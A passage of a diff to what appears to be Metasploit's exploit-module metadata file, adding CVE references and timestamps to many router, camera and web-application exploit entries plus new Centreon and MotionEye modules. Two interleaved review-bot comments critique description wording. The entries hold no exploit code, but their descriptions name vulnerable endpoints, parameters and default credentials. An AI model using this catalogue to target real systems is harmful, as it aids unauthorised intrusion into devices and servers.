"path": "/modules/exploits/linux/http/centreon_auth_rce_cve_2025_5946.rb",
"is_install_path": true,
"ref_name": "linux/http/centreon_auth_rce_cve_2025_5946",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs",
"config-changes"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/centreon_pollers_auth_rce": {
"name": "Centreon Poller Authenticated Remote Command Execution",
"fullname": "exploit/linux/http/centreon_pollers_auth_rce",
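Review bot: the "description" string for exploit_linux/http/centreon_auth_rce_cve_2025_5946 in this hunk carries several wording errors that will surface verbatim in `info` output and the module docs: "exploits an command injection" should be "exploits a command injection", "malcious" should be "malicious", and "You need have admin access at the Centreon Web application" should read "You need admin access to the Centreon Web application". Since this file is generated from the module, the fix belongs in the module's Description field rather than here. Separately, the notes declare "artifacts-on-disk" and "config-changes" side effects while "needs_cleanup" is null; if the module does not already restore the modified poller reload setting after the session is obtained, a cleanup routine would make the metadata consistent with the declared side effects.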
@@ -71195,6 +71652,7 @@
],
"description": "This module exploits a SQL injection and command injection vulnerability in the PHP version of CryptoLog.\n An unauthenticated user can execute a terminal command under the context of the web user. These vulnerabilities\n are no longer present in the ASP.NET version CryptoLog, available since 2009.\n\n CryptoLog's login.php endpoint is responsible for the login process. One of the user supplied parameters is\n used by the application without input validation and parameter binding, which leads to SQL injection\n vulnerability. Successfully exploiting this vulnerability gives a valid session.\n\n CryptoLog's logshares_ajax.php endpoint is responsible for executing an operation system command. It's not\n possible to access this endpoint without having a valid session. One user parameter is used by the\n application while executing an operating system command, which causes a command injection issue.\n\n Combining these vulnerabilities gives the opportunity execute operation system commands under the context\n of the web user.",
"references": [
"CVE-2025-34102",
"URL-https://pentest.blog/advisory-cryptolog-unauthenticated-remote-code-execution/"
],
"platform": "Python",
@@ -71218,7 +71676,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/crypttech_cryptolog_login_exec",
@@ -71326,6 +71784,7 @@
],
"description": "Utilizing the DCOS Cluster's Marathon UI, an attacker can create\n a docker container with the '/' path mounted with read/write\n permissions on the host server that is running the docker container.\n As the docker container executes command as uid 0 it is honored\n by the host operating system allowing the attacker to edit/create\n files owed by root. This exploit abuses this to creates a cron job\n in the '/etc/cron.d/' path of the host server.\n\n *Notes: The docker image must be a valid docker image from\n hub.docker.com. Furthermore the docker container will only\n deploy if there are resources available in the DC/OS cluster.",
"references": [
"CVE-2017-20198",
"URL-https://warroom.securestate.com/dcos-marathon-compromise/"
],
"platform": "",
@@ -71349,7 +71808,7 @@
"targets": [
"Python"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/dcos_marathon.rb",
"is_install_path": true,
"ref_name": "linux/http/dcos_marathon",
@@ -71502,6 +71961,7 @@
],
"description": "This module exploits a remote buffer overflow vulnerability on several D-Link routers.\n The vulnerability exists in the handling of HTTP queries to the authentication.cgi with\n long password values. The vulnerability can be exploitable without authentication. This\n module has been tested successfully on D-Link firmware DIR645A1_FW103B11. Other firmwares\n such as the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable.",
"references": [
"CVE-2013-7389",
"OSVDB-95951",
"EDB-27283",
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008",
@@ -71529,7 +71989,7 @@
"targets": [
"D-Link DIR-645 1.03"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_authentication_cgi_bof",
@@ -71563,6 +72023,7 @@
],
"description": "Various D-Link Routers are vulnerable to OS command injection via the web\n interface. The vulnerability exists in command.php, which is accessible without\n authentication. This module has been tested with the versions DIR-600 2.14b01,\n DIR-300 rev B 2.13.",
"references": [
"CVE-2013-10048",
"OSVDB-89861",
"EDB-24453",
"BID-57734",
@@ -71591,7 +72052,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_command_php_exec_noauth",
@@ -71684,7 +72145,9 @@
"Nicholas Starke <nick@alephvoid.com>"
],
"description": "The D-Link DCS-930L Network Video Camera is vulnerable\n to OS Command Injection via the web interface. The vulnerability\n exists at /setSystemCommand, which is accessible with credentials.\n This vulnerability was present in firmware version 2.01 and fixed\n by 2.12.",
"references": [],
"references": [
"CVE-2016-11021"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
@@ -71708,7 +72171,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dcs_930l_authenticated_remote_command_execution",
@@ -71804,6 +72267,7 @@
],
"description": "Various D-Link Routers are vulnerable to OS command injection via the web\n interface. The vulnerability exists in tools_vct.xgi, which is accessible with\n credentials. According to the vulnerability discoverer, more D-Link devices may\n be affected.",
"references": [
"CVE-2013-10050",
"OSVDB-92698",
"EDB-25024",
"BID-59405",
@@ -71830,7 +72294,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dir300_exec_telnet",
@@ -71864,6 +72328,7 @@
],
"description": "This module exploits an anonymous remote code execution vulnerability on D-Link DIR-605L routers. The\n vulnerability exists while handling user supplied captcha information, and is due to the\n insecure usage of sprintf on the getAuthCode() function. This module has been tested\n successfully on D-Link DIR-605L firmware 1.13 (emulated) and firmware 1.12 (real).",
"references": [
"CVE-2012-10021",
"OSVDB-86824",
"URL-http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/"
],
@@ -71888,7 +72353,7 @@
"targets": [
"D-Link DIR-605L 1.13"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dir605l_captcha_bof",
@@ -71922,6 +72387,7 @@
],
"description": "Some D-Link Routers are vulnerable to an authenticated OS command injection on\n their web interface, where default credentials are admin/admin or admin/password.\n Since it is a blind os command injection vulnerability, there is no output for the\n executed command when using the cmd generic payload. This module was tested against\n a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a\n controlled system could be used for testing purposes. The exploit uses the wget\n client from the device to convert the command injection into an arbitrary payload\n execution.",
"references": [
"CVE-2013-10059",
"BID-57882",
"EDB-24477",
"OSVDB-90174",
@@ -71949,7 +72415,7 @@
"CMD",
"Linux mipsel Payload"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/dlink_dir615_up_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dir615_up_exec",
@@ -71983,6 +72449,7 @@
],
"description": "This module leverages an unauthenticated credential disclosure\n vulnerability to then execute arbitrary commands on DIR-850L routers\n as an authenticated user. Unable to use Meterpreter payloads.",
"references": [
"CVE-2019-17508",
"URL-https://www.seebug.org/vuldb/ssvid-96333",
"URL-https://blogs.securiteam.com/index.php/archives/3310"
],
@@ -72007,7 +72474,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/dlink_dir850l_unauth_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dir850l_unauth_exec",
@@ -72041,6 +72508,7 @@
],
"description": "This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.\n Vulnerability can be exploited through \"cli\" parameter that is directly used to invoke\n \"ayecli\" binary. Vulnerable firmwares are from 1.01 up to 1.03.",
"references": [
"CVE-2016-20017",
"PACKETSTORM-135706",
"URL-https://seclists.org/fulldisclosure/2016/Feb/53",
"URL-http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/"
@@ -72067,7 +72535,7 @@
"Linux mipsbe Payload",
"Linux mipsel Payload"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dsl2750b_exec_noauth",
@@ -72101,6 +72569,7 @@
],
"description": "This module exploits an anonymous remote upload and code execution vulnerability on different\n D-Link devices. The vulnerability is a command injection in the cookie handling process of the\n lighttpd web server when handling specially crafted cookie values. This module has been\n successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.",
"references": [
"CVE-2025-34125",
"URL-http://web.archive.org/web/20160125171424/https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110"
],
"platform": "Linux",
@@ -72125,7 +72594,7 @@
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dspw110_cookie_noauth_exec",
@@ -72159,6 +72628,7 @@
],
"description": "This module exploits an anonymous remote code execution vulnerability on different D-Link\n devices. The vulnerability is a stack based buffer overflow in the my_cgi.cgi component,\n when handling specially crafted POST HTTP requests addresses to the /common/info.cgi\n handler. This module has been successfully tested on D-Link DSP-W215 in an emulated\n environment.",
"references": [
"CVE-2014-125117",
"OSVDB-108249",
"URL-http://www.devttys0.com/2014/05/hacking-the-dspw215-again/"
],
@@ -72184,7 +72654,7 @@
"Automatic Targeting",
"D-Link DSP-W215 - v1.02"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dspw215_info_cgi_bof",
@@ -72279,6 +72749,7 @@
],
"description": "This module exploits an anonymous remote code execution vulnerability on several D-Link\n routers. The vulnerability exists in the handling of HTTP queries to the hedwig.cgi with\n long value cookies. This module has been tested successfully on D-Link DIR300v2.14, DIR600\n and the DIR645A1_FW103B11 firmware.",
"references": [
"CVE-2013-7389",
"OSVDB-95950",
"EDB-27283",
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008",
@@ -72306,7 +72777,7 @@
"targets": [
"Multiple Targets: D-Link DIR-645 v1.03, DIR-300 v2.14, DIR-600"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_hedwig_cgi_bof",
@@ -72404,6 +72875,7 @@
],
"description": "Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP\n interface. Since it is a blind OS command injection vulnerability, there is no\n output for the executed command. This module has been tested on a DIR-645 device.\n The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,\n DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,\n DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR",
"references": [
"CVE-2015-2051",
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051",
"URL-http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/"
],
@@ -72429,7 +72901,7 @@
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_hnap_header_exec_noauth",
@@ -72702,6 +73174,7 @@
],
"description": "This module exploits a vulnerability found in Dolibarr ERP/CRM 3's\n backup feature. This software is used to manage a company's business\n information such as contacts, invoices, orders, stocks, agenda, etc.\n When processing a database backup request, the export.php function\n does not check the input given to the sql_compat parameter, which allows\n a remote authenticated attacker to inject system commands into it,\n and then gain arbitrary code execution.",
"references": [
"CVE-2012-10059",
"OSVDB-80980",
"URL-https://seclists.org/fulldisclosure/2012/Apr/78"
],
@@ -72726,7 +73199,7 @@
"targets": [
"Dolibarr 3.1.1 on Linux"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/dolibarr_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/dolibarr_cmd_exec",
@@ -73122,6 +73595,7 @@
],
"description": "This module exploits a command injection vulnerability found in E-Mail Security\n Virtual Appliance. This module abuses the learn-msg.cgi file to execute arbitrary\n OS commands without authentication. This module has been successfully tested on the\n ESVA_2057 appliance.",
"references": [
"CVE-2012-10046",
"OSVDB-85462",
"BID-55050",
"EDB-20551"
@@ -73147,7 +73621,7 @@
"targets": [
"ESVA_2057"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/esva_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/esva_exec",
@@ -74286,6 +74760,7 @@
],
"description": "This module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6.\n The first is that the session management uses a hard-coded secret value, which can be\n abused to sign a serialized malicious Ruby object. The second problem is due to the\n use of unsafe deserialization, which allows the malicious Ruby object to be loaded,\n and results in arbitrary remote code execution.\n\n This exploit was tested against version 2.8.0.",
"references": [
"CVE-2017-18365",
"EDB-41616",
"URL-http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html",
"URL-https://enterprise.github.com/releases/2.8.7/notes"
@@ -74311,7 +74786,7 @@
"targets": [
"Github Enterprise 2.8"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/github_enterprise_secret.rb",
"is_install_path": true,
"ref_name": "linux/http/github_enterprise_secret",
@@ -74967,6 +75442,7 @@
],
"description": "The H2 database contains an alias function which allows for arbitrary Java code to be used.\n This functionality can be abused to create an exec functionality to pull our payload down\n and execute it. H2's web interface contains restricts MANY characters, so injecting a payload\n directly is not favorable. A valid database connection is required. If the database engine\n was configured to allow creation of databases, the module default can be used which\n utilizes an in memory database. Some Docker instances of H2 don't allow writing to\n folders such as /tmp, so we default to writing to the working directory of the software.\n\n This module was tested against H2 version 2.1.214, 2.0.204, 1.4.199 (version detection fails)",
"references": [
"CVE-2018-10054",
"EDB-44422",
"EDB-45506",
"URL-https://medium.com/r3d-buck3t/chaining-h2-database-vulnerabilities-for-rce-9b535a9621a2",
@@ -74993,7 +75469,7 @@
"targets": [
"Automatic Target"
],
"mod_time": "2023-08-08 15:28:34 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/h2_webinterface_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/h2_webinterface_rce",
@@ -75505,6 +75981,7 @@
],
"description": "This module exploits a command injection vulnerability in Imperva\n SecureSphere 13.x. The vulnerability exists in the PWS service,\n where Python CGIs didn't properly sanitize user supplied command\n parameters and directly passes them to corresponding CLI utility,\n leading to command injection. Agent registration credential is\n required to exploit SecureSphere in gateway mode.\n\n This module was successfully tested on Imperva SecureSphere 13.0/13.1/\n 13.2 in pre-ftl mode and unsealed gateway mode.",
"references": [
"CVE-2018-16660",
"EDB-45542"
],
"platform": "Linux",
@@ -75528,7 +76005,7 @@
"targets": [
"Imperva SecureSphere 13.0/13.1/13.2"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/imperva_securesphere_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/imperva_securesphere_exec",
@@ -75921,6 +76398,7 @@
],
"description": "IPFire, a free linux based open source firewall distribution,\n version < 2.19 Update Core 101 contains a remote command execution\n vulnerability in the proxy.cgi page.",
"references": [
"CVE-2025-34116",
"EDB-39765",
"URL-https://www.ipfire.org/news/ipfire-2-19-core-update-101-released"
],
@@ -75945,7 +76423,7 @@
"targets": [
"Automatic Target"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/ipfire_proxy_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/ipfire_proxy_exec",
@@ -76648,6 +77126,7 @@
],
"description": "This module exploits an Object Injection vulnerability in Kaltura.\n By exploiting this vulnerability, unauthenticated users can execute\n arbitrary code under the context of the web server user.\n\n Kaltura has a module named keditorservices that takes user input\n and then uses it as an unserialized function parameter. The constructed\n object is based on the SektionEins Zend code execution POP chain PoC,\n with a minor modification to ensure Kaltura processes it and the\n Zend_Log function's __destruct() method is called. Kaltura versions\n prior to 11.1.0-2 are affected by this issue.\n\n This module was tested against Kaltura 11.1.0 installed on CentOS 6.8.",
"references": [
"CVE-2016-15044",
"EDB-39563"
],
"platform": "PHP",
@@ -76671,7 +77150,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/kaltura_unserialize_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/kaltura_unserialize_rce",
@@ -76765,6 +77244,7 @@
],
"description": "Kibana before version 7.6.3 suffers from a prototype pollution bug within the\n Upgrade Assistant. By setting a new constructor.prototype.sourceURL value we're\n able to execute arbitrary code.\n Code execution is possible through two different ways. Either by sending data\n directly to Elastic, or using Kibana to submit the same queries. Either method\n enters the polluted prototype for Kibana to read.\n\n Kibana will either need to be restarted, or collection happens (unknown time) for\n the payload to execute. Once it does, cleanup must delete the .kibana_1 index\n for Kibana to restart successfully. Once a callback does occur, cleanup will\n happen allowing Kibana to be successfully restarted on next attempt.",
"references": [
"CVE-2020-7012",
"URL-https://hackerone.com/reports/852613"
],
"platform": "Linux",
@@ -76789,7 +77269,7 @@
"ELASTIC",
"KIBANA"
],
"mod_time": "2023-10-06 09:55:10 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/kibana_upgrade_assistant_telemetry_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/kibana_upgrade_assistant_telemetry_rce",
@@ -76889,6 +77369,7 @@
],
"description": "This module exploits an unauthenticated SQL injection vulnerability affecting Kloxo, as\n exploited in the wild on January 2014. The SQL injection issue can be abused in order to\n retrieve the Kloxo admin cleartext password from the database. With admin access to the\n web control panel, remote PHP code execution can be achieved by abusing the Command Center\n function. The module tries to find the first server in the tree view, unless the server\n information is provided, in which case it executes the payload there.",
"references": [
"CVE-2014-125123",
"URL-https://vpsboard.com/topic/3384-kloxo-installations-compromised/",
"URL-http://www.webhostingtalk.com/showthread.php?p=8996984",
"URL-http://forum.lxcenter.org/index.php?t=msg&th=19215&goto=102646"
@@ -76914,7 +77395,7 @@
"targets": [
"Kloxo / CentOS"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/kloxo_sqli.rb",
"is_install_path": true,
"ref_name": "linux/http/kloxo_sqli",
@@ -77368,6 +77849,7 @@
],
"description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n Default credentials for the web interface are admin/admin or admin/password. Since\n it is a blind os command injection vulnerability, there is no output for the\n executed command when using the cmd generic payload. A ping command against a\n controlled system could be used for testing purposes.",
"references": [
"CVE-2018-3953",
"BID-57760",
"EDB-24475",
"OSVDB-89912",
@@ -77395,7 +77877,7 @@
"CMD",
"Linux mipsel Payload"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/linksys_e1500_apply_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_e1500_apply_exec",
@@ -77432,6 +77914,7 @@
],
"description": "Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command\n injection. This vulnerability was used from the so-called \"TheMoon\" worm. There\n are many Linksys systems that are potentially vulnerable, including E4200, E3200, E3000,\n E2500, E2100L, E2000, E1550, E1500, E1200, E1000, and E900. This module was tested\n successfully against an E1500 v1.0.5.",
"references": [
"CVE-2025-34037",
"EDB-31683",
"BID-65585",
"OSVDB-103321",
@@ -77462,7 +77945,7 @@
"Linux mipsel Payload",
"Linux mipsbe Payload"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/linksys_themoon_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_themoon_exec",
@@ -77556,6 +78039,7 @@
],
"description": "Some Linksys Routers are vulnerable to an authenticated OS command injection on\n their web interface where default credentials are admin/admin or admin/password.\n Since it is a blind OS command injection vulnerability, there is no output for the\n executed command when using the cmd generic payload. This module has been tested on\n a Linksys WRT160n version 2 - firmware version v2.0.03. A ping command against a\n controlled system could be used for testing purposes. The exploit uses the tftp\n client from the device to stage to native payloads from the command injection.",
"references": [
"CVE-2013-10058",
"BID-57887",
"EDB-24478",
"OSVDB-90093",
@@ -77583,7 +78067,7 @@
"CMD",
"Linux mipsel Payload"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_wrt160nv2_apply_exec",
@@ -77800,6 +78284,7 @@
],
"description": "This module exploits a command injection vulnerability in Logsign.\n By exploiting this vulnerability, unauthenticated users can execute\n arbitrary code under the root user.\n\n Logsign has a publicly accessible endpoint. That endpoint takes a user\n input and then use it during operating system command execution without\n proper validation.\n\n This module was tested against 4.4.2 and 4.4.137 versions.",
"references": [
"CVE-2024-5721",
"URL-https://pentest.blog/unexpected-journey-3-visiting-another-siem-and-uncovering-pre-auth-privileged-remote-code-execution/"
],
"platform": "Python",
@@ -77823,7 +78308,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/logsign_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/logsign_exec",
@@ -78587,6 +79072,65 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/motioneye_auth_rce_cve_2025_60787": {
"name": "Remote Code Execution Vulnerability in MotionEye Frontend (CVE-2025-60787)",
"fullname": "exploit/linux/http/motioneye_auth_rce_cve_2025_60787",
"aliases": [],
"rank": 600,
"disclosure_date": "2025-09-09",
"type": "exploit",
"author": [
"Maksim Rogov",
"prabhatverma47"
],
"description": "This module exploits a template injection vulnerability in the MotionEye Frontend.\n\n MotionEye Frontend versions 0.43.1b4 and prior are vulnerable to OS Command Injection in configuration parameters such as image_file_name.\n Unsanitized user input is written to MotionEye Frontend configuration files, allowing remote authenticated attackers with admin access to achieve code execution.\n\n Successful exploitation will result in the command executing as the user running\n the web server, potentially exposing sensitive data or disrupting survey operations.\n\n An attacker can execute arbitrary system commands in the context of the user running the web server.",
"references": [
"CVE-2025-60787",
"URL-https://github.com/prabhatverma47/motionEye-RCE-through-config-parameter"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix Command"
],
"mod_time": "2025-10-09 21:51:31 +0000",
"path": "/modules/exploits/linux/http/motioneye_auth_rce_cve_2025_60787.rb",
"is_install_path": true,
"ref_name": "linux/http/motioneye_auth_rce_cve_2025_60787",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/multi_ncc_ping_exec": {
"name": "D-Link/TRENDnet NCC Service Command Injection",
"fullname": "exploit/linux/http/multi_ncc_ping_exec",
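Review bot: the "description" for exploit_linux/http/motioneye_auth_rce_cve_2025_60787 in this hunk is internally inconsistent and should be tightened at the source module: the first sentence calls the issue a "template injection vulnerability" while the next paragraph describes "OS Command Injection in configuration parameters such as image_file_name", and only one of those characterisations should be kept. "disrupting survey operations" looks like a slip for "surveillance operations". The two closing sentences ("Successful exploitation will result in the command executing as the user running the web server..." and "An attacker can execute arbitrary system commands in the context of the user running the web server.") say the same thing and can be merged into one.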
@@ -78723,6 +79267,7 @@
],
"description": "This module exploits an unauthenticated remote command execution\n vulnerability in MVPower digital video recorders. The 'shell' file\n on the web interface executes arbitrary operating system commands in\n the query string.\n\n This module was tested successfully on a MVPower model TV-7104HE with\n firmware version 1.8.4 115215B9 (Build 2014/11/17).\n\n The TV-7108HE model is also reportedly affected, but untested.",
"references": [
"CVE-2016-20016",
"URL-http://web.archive.org/web/20200512230920/https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/",
"URL-https://www.pentestpartners.com/blog/pwning-cctv-cameras/"
],
@@ -78747,7 +79292,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/mvpower_dvr_shell_exec",
@@ -78841,6 +79386,10 @@
],
"description": "This module exploits an SQL injection, auth bypass, file upload,\n command injection, and privilege escalation in Nagios XI <= 5.2.7\n to pop a root shell.",
"references": [
"CVE-2018-8733",
"CVE-2018-8734",
"CVE-2018-8735",
"CVE-2018-8736",
"EDB-39899"
],
"platform": "Unix",
@@ -78864,7 +79413,7 @@
"targets": [
"Nagios XI <= 5.2.7"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/nagios_xi_chained_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/nagios_xi_chained_rce",
@@ -79391,6 +79940,7 @@
],
"description": "This module exploits an unauthenticated OS command execution vulneralbility\n in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and\n DGN2000v1 models.",
"references": [
"CVE-2024-12847",
"EDB-25978"
],
"platform": "Linux",
@@ -79414,7 +79964,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_dgn1000_setup_unauth_exec",
@@ -79448,6 +79998,7 @@
],
"description": "Some Netgear Routers are vulnerable to authenticated OS Command injection. The\n vulnerability exists in the web interface, specifically in the setup.cgi component,\n when handling the TimeToLive parameter. Default credentials are always a good\n starting point, admin/admin or admin/password could be a first try. Since it is a\n blind os command injection vulnerability, there is no output for the executed\n command when using the cmd generic payload. A ping command against a controlled\n system could be used for testing purposes.",
"references": [
"CVE-2013-10061",
"BID-57836",
"EDB-24464",
"OSVDB-89985",
@@ -79475,7 +80026,7 @@
"CMD",
"Linux mipsbe Payload"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_dgn1000b_setup_exec",
@@ -79509,6 +80060,7 @@
],
"description": "Some Netgear Routers are vulnerable to an authenticated OS command injection\n on their web interface. Default credentials for the web interface are admin/admin\n or admin/password. Since it is a blind os command injection vulnerability, there\n is no output for the executed command when using the cmd generic payload. A ping\n command against a controlled system could be used for testing purposes. This module\n overwrites parts of the PPOE configuration, while the module tries to restore it\n after exploitation configuration backup is recommended.",
"references": [
"CVE-2013-10060",
"BID-57998",
"EDB-24513",
"OSVDB-90320",
@@ -79536,7 +80088,7 @@
"CMD",
"Linux mipsbe Payload"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_dgn2200b_pppoe_exec",
@@ -80283,6 +80835,7 @@
],
"description": "op5 an open source network monitoring software.\n The configuration page in version 7.1.9 and below\n allows the ability to test a system command, which\n can be abused to run arbitrary code as an unpriv user.",
"references": [
"CVE-2025-34115",
"EDB-39676",
"URL-https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/"
],
@@ -80307,7 +80860,7 @@
"targets": [
"Automatic Target"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/op5_config_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/op5_config_exec",
@@ -80340,6 +80893,7 @@
],
